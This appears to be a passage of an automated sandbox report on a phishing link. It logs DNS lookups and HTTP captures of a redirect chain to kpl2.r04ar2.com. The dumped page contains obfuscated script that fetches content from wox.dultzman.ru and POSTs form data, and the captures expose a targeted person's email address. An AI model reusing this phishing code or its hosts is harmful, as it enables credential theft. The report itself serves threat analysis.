                                                          Aug 28, 2024 00:10:38.044460058 CEST1.1.1.1192.168.2.40xd8e8No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.044460058 CEST1.1.1.1192.168.2.40xd8e8No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.044894934 CEST1.1.1.1192.168.2.40xc763No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.050932884 CEST1.1.1.1192.168.2.40xa130No error (0)wox.dultzman.ru188.114.96.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.050932884 CEST1.1.1.1192.168.2.40xa130No error (0)wox.dultzman.ru188.114.97.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.052700043 CEST1.1.1.1192.168.2.40x1092No error (0)wox.dultzman.ru65IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.862867117 CEST1.1.1.1192.168.2.40xb082No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.862867117 CEST1.1.1.1192.168.2.40xb082No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.862867117 CEST1.1.1.1192.168.2.40xb082No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.862867117 CEST1.1.1.1192.168.2.40xb082No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.869364023 CEST1.1.1.1192.168.2.40x12b5No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.869364023 CEST1.1.1.1192.168.2.40x12b5No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.869927883 CEST1.1.1.1192.168.2.40xa95dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:39.409416914 CEST1.1.1.1192.168.2.40x5752No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:39.409416914 CEST1.1.1.1192.168.2.40x5752No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:39.410357952 CEST1.1.1.1192.168.2.40xd6f3No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:03.485218048 CEST1.1.1.1192.168.2.40x8b49No error (0)kpl2.r04ar2.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:03.634663105 CEST1.1.1.1192.168.2.40xd7e7No error (0)kpl2.r04ar2.com188.114.96.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:03.634663105 CEST1.1.1.1192.168.2.40xd7e7No error (0)kpl2.r04ar2.com188.114.97.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:05.255229950 CEST1.1.1.1192.168.2.40x38aNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.746649981 CEST1.1.1.1192.168.2.40xfa40No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.749564886 CEST1.1.1.1192.168.2.40x642aNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.749564886 CEST1.1.1.1192.168.2.40x642aNo error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.40A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.749564886 CEST1.1.1.1192.168.2.40x642aNo error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.97A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.749564886 CEST1.1.1.1192.168.2.40x642aNo error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.47A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.749564886 CEST1.1.1.1192.168.2.40x642aNo error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.11A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.752680063 CEST1.1.1.1192.168.2.40x4ff0No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.753035069 CEST1.1.1.1192.168.2.40x3a22No error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.753045082 CEST1.1.1.1192.168.2.40x8917No error (0)www.google.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.764017105 CEST1.1.1.1192.168.2.40x7fc9No error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.764017105 CEST1.1.1.1192.168.2.40x7fc9No error (0)d19d360lklgih4.cloudfront.net13.33.187.68A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.764017105 CEST1.1.1.1192.168.2.40x7fc9No error (0)d19d360lklgih4.cloudfront.net13.33.187.14A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.764017105 CEST1.1.1.1192.168.2.40x7fc9No error (0)d19d360lklgih4.cloudfront.net13.33.187.96A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.764017105 CEST1.1.1.1192.168.2.40x7fc9No error (0)d19d360lklgih4.cloudfront.net13.33.187.120A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.772898912 CEST1.1.1.1192.168.2.40x6f8aNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.692989111 CEST1.1.1.1192.168.2.40xeccNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.693264008 CEST1.1.1.1192.168.2.40x7d4bNo error (0)www.google.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.814215899 CEST1.1.1.1192.168.2.40xc6b6No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.814215899 CEST1.1.1.1192.168.2.40xc6b6No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.814215899 CEST1.1.1.1192.168.2.40xc6b6No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.814215899 CEST1.1.1.1192.168.2.40xc6b6No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.827498913 CEST1.1.1.1192.168.2.40x3f7eNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.827498913 CEST1.1.1.1192.168.2.40x3f7eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.827498913 CEST1.1.1.1192.168.2.40x3f7eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.827498913 CEST1.1.1.1192.168.2.40x3f7eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.827498913 CEST1.1.1.1192.168.2.40x3f7eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.841056108 CEST1.1.1.1192.168.2.40xaf9No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Aug 28, 2024 00:11:08.708456039 CEST1.1.1.1192.168.2.40xb641No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:08.708456039 CEST1.1.1.1192.168.2.40xb641No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:08.708456039 CEST1.1.1.1192.168.2.40xb641No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:08.708456039 CEST1.1.1.1192.168.2.40xb641No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:10.630398035 CEST1.1.1.1192.168.2.40x3d92No error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:10.630398035 CEST1.1.1.1192.168.2.40x3d92No error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:10.630398035 CEST1.1.1.1192.168.2.40x3d92No error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:10.630795002 CEST1.1.1.1192.168.2.40xbc0No error (0)get.geojs.io65IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.288680077 CEST1.1.1.1192.168.2.40x2b7cNo error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.288680077 CEST1.1.1.1192.168.2.40x2b7cNo error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.288680077 CEST1.1.1.1192.168.2.40x2b7cNo error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.292407036 CEST1.1.1.1192.168.2.40xd9ecNo error (0)get.geojs.io65IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.370148897 CEST1.1.1.1192.168.2.40xba70No error (0)nse.idwp.ru65IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.457130909 CEST1.1.1.1192.168.2.40xa6e1No error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.457130909 CEST1.1.1.1192.168.2.40xa6e1No error (0)d19d360lklgih4.cloudfront.net65.9.86.56A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.457130909 CEST1.1.1.1192.168.2.40xa6e1No error (0)d19d360lklgih4.cloudfront.net65.9.86.22A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.457130909 CEST1.1.1.1192.168.2.40xa6e1No error (0)d19d360lklgih4.cloudfront.net65.9.86.73A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.457130909 CEST1.1.1.1192.168.2.40xa6e1No error (0)d19d360lklgih4.cloudfront.net65.9.86.83A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.459904909 CEST1.1.1.1192.168.2.40x502bNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.509155989 CEST1.1.1.1192.168.2.40x413bNo error (0)nse.idwp.ru104.21.67.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.509155989 CEST1.1.1.1192.168.2.40x413bNo error (0)nse.idwp.ru172.67.210.174A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:13.209302902 CEST1.1.1.1192.168.2.40x4c17No error (0)nse.idwp.ru65IN (0x0001)false
                                                          Aug 28, 2024 00:11:13.365185976 CEST1.1.1.1192.168.2.40xdefbNo error (0)nse.idwp.ru104.21.67.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:13.365185976 CEST1.1.1.1192.168.2.40xdefbNo error (0)nse.idwp.ru172.67.210.174A (IP address)IN (0x0001)false
                                                          • href.li
                                                          • kpl2.r04ar2.com
                                                          • https:
                                                            • wox.dultzman.ru
                                                            • code.jquery.com
                                                            • challenges.cloudflare.com
                                                            • cdnjs.cloudflare.com
                                                            • www.google.com
                                                            • github.com
                                                            • cdn.socket.io
                                                            • ok4static.oktacdn.com
                                                            • objects.githubusercontent.com
                                                            • get.geojs.io
                                                            • nse.idwp.ru
                                                          • fs.microsoft.com
                                                          • slscr.update.microsoft.com
                                                          • a.nel.cloudflare.com
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449736192.0.78.264431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:29 UTC695OUTGET /?https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au HTTP/1.1
                                                          Host: href.li
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: iframe
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:29 UTC279INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 27 Aug 2024 22:10:29 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000
                                                          Vary: Accept-Encoding
                                                          X-ac: 2.jfk _dfw MISS
                                                          Alt-Svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:29 UTC594INData Raw: 32 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 68 72 65 66 2e 6c 69 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 4b 50 4c 32 2e 72 30 34 61 72 32 2e 63 6f 6d 2f 4b 50 4c 32 2f 3f 65 6d 3d 6e 61 74 61 73 68 61 2e 68 61 6d 6d 6f 6e 64 40 6c 63 68 73 2e 63 6f 6d 2e 61 75 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41
                                                          Data Ascii: 246<!DOCTYPE html><html><head><title>href.li</title><meta http-equiv="Refresh" content="0; url=https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au" /><meta name="referrer" content="no-referrer" /><script type="text/javascript">/* <![CDATA


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449740188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:31 UTC678OUTGET /KPL2/?em=natasha.hammond@lchs.com.au HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: iframe
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:32 UTC1005INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: no-cache, private
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ycjdjIVGrArs%2FD4cHrNUqFCM8fd4%2BSt6w19OcCa5JY1GXZpK6in15pcGMDDYk4Jk2eVj1yQI0M5d%2FmgzVWdK5v60Lzo9wkhx5s3eWahvXNTiQ1GiiDYHyoDJCPxJwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IisvOG9mR2JjOWNQd1QwWGhmUXQ3VlE9PSIsInZhbHVlIjoiRnUvcXBDOHFiZWxEdVlSdy85RnVoNzlxZnBPVkJ4dGQwNFpaeWhpcjFUZVZYb3U5NDhFSW0ydjRhcC9jdGdlTE5tRm0zTDd3K3JGZkxXR2JzM09NeEZjemdqcWJWcE1LdzlRTHM4OHU4Skd3TFV6SkRmbEhHcWF2dnp3OFhwSHUiLCJtYWMiOiIwOTkwNWU0YTVkYmVjMzYzYjdhNTI4YTVlZWQzZTc1MDlhMWUxODk2MjYzZTFjOGViMGZhMDEyZDNlODViNTJlIiwidGFnIjoiIn0%3D; expires=Wed, 28-Aug-2024 00:10:32 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                          2024-08-27 22:10:32 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 59 33 4d 55 6f 72 4f 48 49 31 53 7a 46 76 4e 55 64 61 56 6e 42 50 61 6b 51 78 55 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 7a 64 35 62 47 68 50 59 58 64 44 4e 30 35 4d 56 6b 56 6d 52 6d 74 68 55 6d 64 30 61 46 42 75 5a 31 6c 31 52 58 4a 33 64 33 68 61 53 53 39 61 5a 6b 64 70 59 56 46 76 53 54 41 35 54 79 74 31 62 6b 35 55 52 45 64 6c 4d 58 55 35 64 6c 6b 34 4e 7a 6c 73 63 7a 6b 34 62 48 4a 6b 55 6a 52 44 57 6c 6f 76 57 46 68 50 5a 6d 6c 61 52 31 6f 34 4e 47 6c 79 51 6c 52 48 4d 46 6c 59 5a 6a 46 46 61 6b 35 4a 54 53 74 4d 51 55 5a 43 5a 31 52 72 56 6a 68 30 63 7a 4a 53 65 6b 74 56 51 31 46 72 55 31 68 58 56 6a 4a 30 57 53 38
                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InY3MUorOHI1SzFvNUdaVnBPakQxUGc9PSIsInZhbHVlIjoiNzd5bGhPYXdDN05MVkVmRmthUmd0aFBuZ1l1RXJ3d3haSS9aZkdpYVFvSTA5Tyt1bk5UREdlMXU5dlk4Nzlsczk4bHJkUjRDWlovWFhPZmlaR1o4NGlyQlRHMFlYZjFFak5JTStMQUZCZ1RrVjh0czJSektVQ1FrU1hXVjJ0WS8
                                                          2024-08-27 22:10:32 UTC1369INData Raw: 31 39 61 63 0d 0a 3c 73 63 72 69 70 74 3e 66 65 74 63 68 28 27 68 74 74 70 73 3a 2f 2f 77 6f 78 2e 64 75 6c 74 7a 6d 61 6e 2e 72 75 2f 79 75 6a 75 6d 69 74 7a 67 76 77 64 6d 65 6c 7a 69 6e 6d 65 77 51 78 74 4c 4f 59 4a 4e 45 56 58 53 53 44 48 49 48 53 56 43 45 54 43 49 45 56 50 4e 45 52 48 54 58 4e 55 4d 44 44 50 58 55 4b 4c 42 42 4c 4c 4a 43 5a 41 59 58 58 42 4b 4f 45 51 50 4d 41 55 43 43 27 2c 20 7b 0d 0a 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0d 0a 7d 29 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 28 29 0d 0a 7d 29 2e 74 68 65 6e 28 74 65 78 74 20 3d 3e 20 7b 0d 0a 69 66 28 74 65 78 74 20 3d 3d 20 30 29 7b 20 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f
                                                          Data Ascii: 19ac<script>fetch('https://wox.dultzman.ru/yujumitzgvwdmelzinmewQxtLOYJNEVXSSDHIHSVCETCIEVPNERHTXNUMDDPXUKLBBLLJCZAYXXBKOEQPMAUCC', {method: "GET",}).then(response => {return response.text()}).then(text => {if(text == 0){ document.write(deco
                                                          2024-08-27 22:10:32 UTC1369INData Raw: 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 54 33 46 33 64 6b 74 5a 65 55 4a 35 65 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 39 78 64 33 5a 4c 57 58 6c 43 65 58 6f 75 59 32 39 75 64 47 46 70 62 6d 56 79 65 33 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f
                                                          Data Ascii: EuNXJlbTt9DQp9DQojT3F3dktZeUJ5eiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI09xd3ZLWXlCeXouY29udGFpbmVye3dpZHRoOiAxMDAlO3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0O
                                                          2024-08-27 22:10:32 UTC1369INData Raw: 73 65 53 42 6a 62 32 31 6c 63 79 42 30 62 79 42 30 61 47 39 7a 5a 53 42 33 61 47 38 67 59 58 4a 6c 49 48 52 76 62 79 42 69 64 58 4e 35 49 48 52 76 49 47 4a 6c 49 47 78 76 62 32 74 70 62 6d 63 67 5a 6d 39 79 49 47 6c 30 4c 69 41 74 4c 54 34 4b 50 47 4a 76 5a 48 6b 67 63 33 52 35 62 47 55 39 49 6d 5a 76 62 6e 51 74 5a 6d 46 74 61 57 78 35 4f 69 42 68 63 6d 6c 68 62 43 77 67 63 32 46 75 63 79 31 7a 5a 58 4a 70 5a 6a 74 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 32 4e 76 62 47 39 79 4f 69 41 6a 4d 44 41 77 4f 33 42 68 5a 47 52 70 62 6d 63 36 49 44 49 77 63 48 67 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 78 4f 48 42 34 4f 32 39 32 5a 58 4a 7a 59 33 4a 76 62 47 77 74 59 6d 56 6f 59 58 5a 70 62 33 49 36 49 47
                                                          Data Ascii: seSBjb21lcyB0byB0aG9zZSB3aG8gYXJlIHRvbyBidXN5IHRvIGJlIGxvb2tpbmcgZm9yIGl0LiAtLT4KPGJvZHkgc3R5bGU9ImZvbnQtZmFtaWx5OiBhcmlhbCwgc2Fucy1zZXJpZjtiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmO2NvbG9yOiAjMDAwO3BhZGRpbmc6IDIwcHg7Zm9udC1zaXplOiAxOHB4O292ZXJzY3JvbGwtYmVoYXZpb3I6IG
                                                          2024-08-27 22:10:32 UTC1369INData Raw: 64 6a 35 5a 62 33 56 79 49 47 4a 79 59 57 35 6b 49 47 6c 7a 49 48 64 6f 59 58 51 67 63 47 56 76 63 47 78 6c 49 48 4e 68 65 53 42 68 59 6d 39 31 64 43 42 35 62 33 55 67 64 32 68 6c 62 69 42 35 62 33 55 6d 49 7a 41 7a 4f 54 74 79 5a 53 42 75 62 33 51 67 61 57 34 67 64 47 68 6c 49 48 4a 76 62 32 30 75 50 43 39 6b 61 58 59 2b 49 43 30 74 50 67 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 32 59 57 78 31 5a 54 30 69 5a 57 30 6c 4d 30 52 75 59 58 52 68 63 32 68 68 4c 6d 68 68 62 57 31 76 62 6d 51 6c 4e 44 42 73 59 32 68 7a 4c 6d 4e 76 62 53 35 68 64 53 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f
                                                          Data Ascii: dj5Zb3VyIGJyYW5kIGlzIHdoYXQgcGVvcGxlIHNheSBhYm91dCB5b3Ugd2hlbiB5b3UmIzAzOTtyZSBub3QgaW4gdGhlIHJvb20uPC9kaXY+IC0tPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGRhdGEiIG5hbWU9ImJsdGRkYXRhIiB2YWx1ZT0iZW0lM0RuYXRhc2hhLmhhbW1vbmQlNDBsY2hzLmNvbS5hdSI+DQo8L2Zvcm0+DQo
                                                          2024-08-27 22:10:32 UTC1104INData Raw: 57 46 50 64 44 64 6b 52 55 70 7a 4e 58 51 69 4f 77 30 4b 49 43 41 67 49 47 5a 6c 64 47 4e 6f 4b 45 31 54 51 6e 56 4a 54 58 52 4a 61 55 67 73 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 50 55 48 64 35 65 6d 64 33 54 56 70 35 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67
                                                          Data Ascii: WFPdDdkRUpzNXQiOw0KICAgIGZldGNoKE1TQnVJTXRJaUgsIHsNCiAgICAgICAgbWV0aG9kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShPUHd5emd3TVp5KQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAg
                                                          2024-08-27 22:10:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449745188.114.97.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:36 UTC629OUTGET /yujumitzgvwdmelzinmewQxtLOYJNEVXSSDHIHSVCETCIEVPNERHTXNUMDDPXUKLBBLLJCZAYXXBKOEQPMAUCC HTTP/1.1
                                                          Host: wox.dultzman.ru
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://kpl2.r04ar2.com
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:38 UTC614INHTTP/1.1 200 OK
